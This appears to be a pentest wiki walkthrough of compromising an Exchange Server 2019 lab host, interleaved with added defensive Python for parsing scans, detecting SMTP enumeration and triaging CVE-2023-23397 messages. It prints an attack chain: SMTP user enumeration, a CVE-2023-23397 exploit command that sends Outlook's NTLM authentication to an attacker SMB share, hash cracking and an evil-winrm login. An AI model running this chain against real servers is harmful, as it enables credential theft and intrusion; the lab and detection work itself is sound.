wiki.hackerlab.cz
OWA Exchange Server 2019

Exchange Server 2019

Nmap

nmap -p- -A <IP> -oA myHost   # all TCP ports, version/OS detection and default scripts; writes myHost.nmap/.gnmap/.xml
Starting Nmap 7.93 ( https://nmap.org ) at XXX EDT
PORT      STATE SERVICE              VERSION
25/tcp    open  smtp                 Microsoft Exchange smtpd
| smtp-commands: ad.domain Hello [10.10.16.158], SIZE, PI
53/tcp    open  domain               Simple DNS Plus
80/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
81/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 403 - Forbidden: Access is denied.
88/tcp    open  kerberos-sec         Microsoft Windows Kerberos (server time: XXXX-XX)
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
389/tcp   open  ldap                 Microsoft Windows Active Directory LDAP (Domain:DOMAIN
443/tcp   open  ssl/https
444/tcp   open  snpp?
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
465/tcp   open  smtp                 Microsoft Exchange smtpd
587/tcp   open  smtp                 Microsoft Exchange smtpd
|_  Product_Version: 10.0.17763
593/tcp   open  ncacn_http           Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
717/tcp   open  smtp                 Microsoft Exchange smtpd
808/tcp   open  ccproxy-http?
890/tcp   open  mc-nmf               .NET Message Framing
1801/tcp  open  msmq?
2103/tcp  open  msrpc                Microsoft Windows RPC
2105/tcp  open  msrpc                Microsoft Windows RPC
2107/tcp  open  msrpc                Microsoft Windows RPC
3268/tcp  open  ldap                 Microsoft Windows Active Directory LDAP (Domain: DOMAIN., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
| ssl-cert: Subject: commonName=DOMAIN
| Not valid before: X
|_Not valid after:  X
| rdp-ntlm-info: 
|   Target_Name: DOMAIN
|   NetBIOS_Domain_Name: DOMAIN
|   NetBIOS_Computer_Name: DOMAIN
|   DNS_Domain_Name: DOMAIN
|   DNS_Computer_Name: DOMAIN
|   DNS_Tree_Name: DOMAIN
|   Product_Version: 10.0.17763
|_  System_Time: XXX
3875/tcp  open  msexchange-logcopier Microsoft Exchange 2010 log copier
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp  open  ncacn_http           Microsoft Windows RPC over HTTP 1.0
6067/tcp  open  msrpc                Microsoft Windows RPC
...
64327/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
64337/tcp open  mc-nmf               .NET Message Framing
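The scan above mixes mail, directory, file-sharing and remote-administration listeners on one host, and the rest of this page walks through exactly those roles (SMTP, OWA, SMB, WinRM). The following is an added example, not code from the wiki or from nmap: it parses the normal-output port lines (the `.nmap` file written by `-oA`) and groups open ports by role so the exposure of an Exchange host can be summarised at a glance. The port-to-role mapping and the sample excerpt are constructed for this example.

```python
import re

# Constructed excerpt in the layout of nmap normal output (the .nmap file from -oA).
# Values are made up for this example; they are not a capture from a real host.
SAMPLE_NMAP = """\
PORT      STATE SERVICE              VERSION
25/tcp    open  smtp                 Microsoft Exchange smtpd
80/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec         Microsoft Windows Kerberos
389/tcp   open  ldap                 Microsoft Windows Active Directory LDAP
443/tcp   open  ssl/https
445/tcp   open  microsoft-ds?
587/tcp   open  smtp                 Microsoft Exchange smtpd
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
"""

# "<port>/<proto>  <state>  <service>  [<version ...>]"; script output lines ("|", "|_") do not match.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Assumed role mapping for an Exchange server that is also a domain controller.
ROLES = {
    "mail": {25, 465, 587},                    # SMTP receive connectors
    "owa": {443},                              # OWA / EWS / ActiveSync over HTTPS
    "directory": {88, 389, 636, 3268, 3269},   # Kerberos, LDAP, global catalog
    "smb": {445},                              # SMB
    "remote-admin": {3389, 5985, 5986},        # RDP, WinRM
}


def parse_ports(text):
    """Return one dict per port line: port, proto, state, service, version."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line.rstrip())
        if not m:
            continue
        ports.append({
            "port": int(m.group(1)),
            "proto": m.group(2),
            "state": m.group(3),
            "service": m.group(4),
            "version": (m.group(5) or "").strip(),
        })
    return ports


def exposure_report(ports):
    """Group open ports by role and note whether Exchange's own SMTP service was identified."""
    open_ports = {p["port"] for p in ports if p["state"] == "open" and p["proto"] == "tcp"}
    report = {role: sorted(open_ports & members) for role, members in ROLES.items()}
    report["exchange_smtpd"] = any(
        "Exchange" in p["version"] for p in ports if p["service"] == "smtp"
    )
    return report


if __name__ == "__main__":
    for role, members in exposure_report(parse_ports(SAMPLE_NMAP)).items():
        print(f"{role:15} {members}")
```

To use it on a real scan, read `myHost.nmap` from `-oA` into `parse_ports` in place of the constructed sample.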

OWA - HTTPS 443

git clone https://github.com/kh4sh3i/exchange-penetration-testing.git
cd exchange-penetration-testing
python3 get_exchange_version.py https://10.129.229.14   # fingerprint the Exchange build number over HTTPS

Build number:15.2.1118
Exchange Server 2019
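The build number reported above is what maps the host to a product generation: Exchange 2013, 2016 and 2019 all share major version 15 and differ in the minor number (15.0, 15.1, 15.2). The following is an added example, not the wiki's code and not the `get_exchange_version.py` script from the linked repository: it extracts a build number from the `/owa/auth/<build>/` resource paths that the OWA logon page references and classifies it. The HTML fragment is constructed for the example; the fetch is left to the caller so the block runs offline.

```python
import re

# Constructed fragment in the shape of an OWA logon page; the real page embeds the
# build number in its resource paths the same way. Not captured from a live server.
SAMPLE_OWA_HTML = """
<html><head>
<link rel="shortcut icon" href="/owa/auth/15.2.1118/themes/resources/favicon.ico" type="image/x-icon">
<link rel="stylesheet" href="/owa/auth/15.2.1118/themes/resources/logon.css">
</head><body></body></html>
"""

BUILD_RE = re.compile(r"/owa/auth/(\d+\.\d+\.\d+(?:\.\d+)?)/")

# Exchange 2013/2016/2019 are all version 15.x and differ only in the minor number.
FAMILIES_15 = {0: "Exchange Server 2013", 1: "Exchange Server 2016", 2: "Exchange Server 2019"}


def extract_build(html):
    """Return the first build number found in an /owa/auth/<build>/ path, or None."""
    m = BUILD_RE.search(html)
    return m.group(1) if m else None


def classify_build(build):
    """Map a build string such as '15.2.1118' to the Exchange generation it belongs to."""
    major, minor = (int(x) for x in build.split(".")[:2])
    if major == 15:
        return FAMILIES_15.get(minor, f"unknown Exchange 15.{minor} build")
    if major == 14:
        return "Exchange Server 2010"
    return f"unknown Exchange family {major}.{minor}"


def fingerprint(html):
    """Combine extraction and classification; None when no build number is present."""
    build = extract_build(html)
    if build is None:
        return None
    return {"build": build, "product": classify_build(build)}


if __name__ == "__main__":
    print(fingerprint(SAMPLE_OWA_HTML))
```

The build number alone tells you the generation, not the patch level; comparing the full number against the vendor's build table is what tells an administrator whether the server is behind on cumulative or security updates.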

SMTP

# -O keeps a clean filename; without it wget saves the file as "xato-net-10-million-usernames.txt?raw=true"
wget -O xato-net-10-million-usernames.txt 'https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt?raw=true'

# RCPT TO enumeration against the Exchange SMTP listener (TCP 25) with the large wordlist
smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./xato-net-10-million-usernames.txt

# the same run against a smaller, curated list
smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./users.txt

└─# smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./users.txt
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... ./users.txt
Target count ............. 1
Username count ........... 8295455
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ <DOMAIN>

######## Scan started at Thu XXX #########
10.129.229.14: valdaccount@DOMAIN exists
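RCPT-mode enumeration leaves a distinctive trace on the server: one client tries many different recipients and gets a `5xx` rejection for almost all of them. The following is an added example, not code from the wiki or from smtp-user-enum: it reads receive-connector protocol log lines, pairs each client `RCPT TO` with the server's reply in the same session, and flags sources whose distinct-recipient count and rejection ratio cross a threshold. The log lines are constructed and modelled on the column layout of an Exchange receive-connector protocol log (date-time, connector-id, session-id, sequence-number, local-endpoint, remote-endpoint, event, data, context); the thresholds are assumptions to be tuned per environment.

```python
import csv
import io
import re
from collections import defaultdict

# Constructed sample modelled on the Exchange receive-connector protocol log layout.
# Event column: "<" = received from client, ">" = sent to client. Not a real capture.
SAMPLE_LOG = r"""
2023-06-01T10:00:01.000Z,EX01\Default Frontend EX01,S1,1,10.129.229.14:25,10.10.16.158:50001,<,RCPT TO:<aaron@ad.domain>,
2023-06-01T10:00:01.010Z,EX01\Default Frontend EX01,S1,2,10.129.229.14:25,10.10.16.158:50001,>,550 5.1.1 User unknown,
2023-06-01T10:00:01.020Z,EX01\Default Frontend EX01,S1,3,10.129.229.14:25,10.10.16.158:50001,<,RCPT TO:<bob@ad.domain>,
2023-06-01T10:00:01.030Z,EX01\Default Frontend EX01,S1,4,10.129.229.14:25,10.10.16.158:50001,>,550 5.1.1 User unknown,
2023-06-01T10:00:01.040Z,EX01\Default Frontend EX01,S2,1,10.129.229.14:25,10.10.16.158:50002,<,RCPT TO:<carol@ad.domain>,
2023-06-01T10:00:01.050Z,EX01\Default Frontend EX01,S2,2,10.129.229.14:25,10.10.16.158:50002,>,550 5.1.1 User unknown,
2023-06-01T10:00:01.060Z,EX01\Default Frontend EX01,S2,3,10.129.229.14:25,10.10.16.158:50002,<,RCPT TO:<dave@ad.domain>,
2023-06-01T10:00:01.070Z,EX01\Default Frontend EX01,S2,4,10.129.229.14:25,10.10.16.158:50002,>,550 5.1.1 User unknown,
2023-06-01T10:00:01.080Z,EX01\Default Frontend EX01,S3,1,10.129.229.14:25,10.10.16.158:50003,<,RCPT TO:<eve@ad.domain>,
2023-06-01T10:00:01.090Z,EX01\Default Frontend EX01,S3,2,10.129.229.14:25,10.10.16.158:50003,>,550 5.1.1 User unknown,
2023-06-01T10:00:01.100Z,EX01\Default Frontend EX01,S3,3,10.129.229.14:25,10.10.16.158:50003,<,RCPT TO:<valdaccount@ad.domain>,
2023-06-01T10:00:01.110Z,EX01\Default Frontend EX01,S3,4,10.129.229.14:25,10.10.16.158:50003,>,250 2.1.5 Recipient OK,
2023-06-01T10:02:00.000Z,EX01\Default Frontend EX01,S9,1,10.129.229.14:25,10.0.0.5:41000,<,MAIL FROM:<app@ad.domain>,
2023-06-01T10:02:00.010Z,EX01\Default Frontend EX01,S9,2,10.129.229.14:25,10.0.0.5:41000,>,250 2.1.0 Sender OK,
2023-06-01T10:02:00.020Z,EX01\Default Frontend EX01,S9,3,10.129.229.14:25,10.0.0.5:41000,<,RCPT TO:<valdaccount@ad.domain>,
2023-06-01T10:02:00.030Z,EX01\Default Frontend EX01,S9,4,10.129.229.14:25,10.0.0.5:41000,>,250 2.1.5 Recipient OK,
"""

RCPT_RE = re.compile(r"^RCPT TO:<([^>]+)>", re.IGNORECASE)


def parse_events(text):
    """Turn protocol log rows into (timestamp, session, client ip, direction, data) records."""
    events = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) < 8 or row[0].startswith("#"):
            continue  # blank lines and the header comment block
        ts, _connector, session, _seq, _local, remote, direction, data = row[:8]
        client_ip = remote.rsplit(":", 1)[0]
        events.append({"ts": ts, "session": session, "ip": client_ip, "dir": direction, "data": data})
    return events


def summarize_rcpt(events):
    """Per client IP, the distinct recipients tried and the subset the server rejected.

    A server reply starting with '5' that directly follows a client RCPT TO in the
    same session is counted as a rejection of that recipient."""
    stats = defaultdict(lambda: {"recipients": set(), "rejected": set()})
    pending = {}  # session -> (ip, recipient) waiting for the server's reply
    for ev in events:
        if ev["dir"] == "<":
            m = RCPT_RE.match(ev["data"])
            if m:
                rcpt = m.group(1).lower()
                stats[ev["ip"]]["recipients"].add(rcpt)
                pending[ev["session"]] = (ev["ip"], rcpt)
            else:
                pending.pop(ev["session"], None)  # some other client command
        elif ev["dir"] == ">" and ev["session"] in pending:
            ip, rcpt = pending.pop(ev["session"])
            if ev["data"][:1] == "5":
                stats[ip]["rejected"].add(rcpt)
    return stats


def find_enumerators(text, min_recipients=5, min_reject_ratio=0.6):
    """Sources that probed at least min_recipients distinct addresses with a high rejection rate."""
    alerts = []
    for ip, s in summarize_rcpt(parse_events(text)).items():
        tried = len(s["recipients"])
        if tried < min_recipients:
            continue
        ratio = len(s["rejected"]) / tried
        if ratio >= min_reject_ratio:
            alerts.append({"ip": ip, "tried": tried, "rejected": len(s["rejected"]), "ratio": round(ratio, 2)})
    return alerts


if __name__ == "__main__":
    for a in find_enumerators(SAMPLE_LOG):
        print(a)
```

The legitimate relay at 10.0.0.5 addresses one valid recipient and is not flagged; the scanner at 10.10.16.158 tries six addresses and is rejected for five. Exchange administrators can reduce what this technique reveals by enabling recipient filtering with a uniform response, and the same counting logic works on any MTA log once the RCPT and reply lines are paired per session.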

CVE-2023-23397

git clone https://github.com/BronzeBee/cve-2023-23397.git

┌──(kali㉿kali)-[/HTB/OWA/cve-2023-23397]
└─$ python cve-2023-23397.py -s 10.129.229.110 -f fromemail@email -t toemail@email -p '\\10.10.16.158\test'
[*] CVE-2023-23397 exploit
[*] Author: @bronzebee

[*] Connecting to 10.129.229.110:25
[*] Sending message to discovered@validaccount.domain
[*] Message sent to all addresses successfully
[*] Total messages sent: 1/1

The exploit requires an SMB server (impacket) to be running first; it receives the authentication attempt that the recipient's Outlook client makes to the path given with -p:

impacket-smbserver -smb2support share .   # serve the current directory as "share" over SMB2 and log the incoming Net-NTLMv2 authentication
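What makes this message dangerous is the reminder sound path it carries: the CVE-2023-23397 property (PidLidReminderFileParameter) points at a UNC share instead of a local `.wav`, so the client authenticates to that host when the reminder fires. On the defensive side the useful check is therefore on stored messages, not on the wire. The following is an added example, not code from the wiki or the linked exploit repository: it triages message records whose reminder path is a UNC path and rates them by whether the target host is inside the organisation's address space. The message records and the internal network list are constructed assumptions; in practice the records would come from a mailbox export or a server-side scan of the property.

```python
import ipaddress
import re

# UNC in either accepted spelling: \\host\share\... or \\?\UNC\host\share\...
UNC_RE = re.compile(r"^\\\\(?:\?\\UNC\\)?([^\\]+)(?:\\|$)", re.IGNORECASE)

# Assumed internal address space for this example; replace with the organisation's own ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed message records: only the fields needed for the check.
# 203.0.113.7 is documentation address space, used here as a stand-in for an external host.
SAMPLE_MESSAGES = [
    {"subject": "Weekly sync", "sender": "alice@ad.domain", "reminder_file_parameter": None},
    {"subject": "Invoice", "sender": "ext@example.net", "reminder_file_parameter": r"\\203.0.113.7\share\s.wav"},
    {"subject": "Standup", "sender": "bob@ad.domain", "reminder_file_parameter": r"\\?\UNC\fileserver.ad.domain\media\r.wav"},
    {"subject": "Lunch", "sender": "carol@ad.domain", "reminder_file_parameter": r"C:\Windows\Media\reminder.wav"},
]


def unc_host(path):
    """Host part of a UNC path, or None when the value is not a UNC path."""
    m = UNC_RE.match(path or "")
    return m.group(1) if m else None


def is_internal(host, nets=INTERNAL_NETS):
    """True/False for an IP literal; None for a hostname, which the address alone cannot place."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None
    return any(ip in n for n in nets)


def triage_message(msg):
    """Return a finding when the reminder sound is a UNC path, otherwise None.

    Any UNC value here is abnormal (the legitimate value is a local file), so every
    match is reported; an external or unresolvable host is rated higher because the
    client's NTLM response would leave the network."""
    host = unc_host(msg.get("reminder_file_parameter"))
    if host is None:
        return None
    internal = is_internal(host)
    severity = "medium" if internal else "high"  # False (external) and None (hostname) both rate high
    if internal is None:
        severity = "medium"
    return {"subject": msg["subject"], "sender": msg["sender"], "host": host, "severity": severity}


def triage_all(messages):
    return [f for f in (triage_message(m) for m in messages) if f]


if __name__ == "__main__":
    for finding in triage_all(SAMPLE_MESSAGES):
        print(finding)
```

Hostnames get a medium rating because an internal-looking name can still resolve externally; resolve them before closing the finding. Beyond patching Outlook, the mitigations that remove the impact are blocking outbound TCP 445 at the perimeter and placing sensitive accounts in the Protected Users group so NTLM is not used for them at all.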

John the Ripper - crack NTLM hash

# "hash" is a file holding the Net-NTLMv2 response logged by impacket-smbserver; add --format=netntlmv2 if john's autodetection is ambiguous
john --wordlist=/usr/share/wordlists/rockyou.txt hash

WinRM - TCP 5985

evil-winrm -i 10.129.229.14 -u validaccount -p 'password'   # PowerShell session over WinRM (TCP 5985) with the cracked credentials


Last updated 1 year ago
